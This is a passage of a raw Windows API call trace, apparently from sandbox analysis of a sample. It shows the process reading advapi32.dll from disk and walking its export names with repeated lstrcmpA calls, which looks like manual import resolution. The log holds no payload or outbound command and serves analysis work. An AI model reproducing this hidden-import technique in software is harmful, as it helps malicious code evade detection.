(normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0188.812] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0188.812] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0188.812] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0188.812] GetProcessHeap () returned 0x4a0000 [0188.812] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa3ef0) returned 0x2d52010 [0188.814] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0188.814] ReadFile (in: hFile=0x140, lpBuffer=0x2d52010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d52010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0188.828] CloseHandle (hObject=0x140) returned 1 [0188.828] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0188.828] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0188.828] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0188.828] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0188.828] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0188.828] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0188.828] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0188.828] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0188.828] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0188.828] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0188.829] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0188.829] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0189.041] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0189.041] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0189.041] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0189.041] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0189.041] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0189.041] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0189.041] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0189.041] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.041] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0189.041] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0189.042] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0189.043] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0189.044] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0189.045] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0189.045] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0189.045] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0189.045] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0189.045] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0189.045] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0189.045] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0189.045] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0189.046] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0189.047] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0189.048] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0189.049] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0189.049] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", 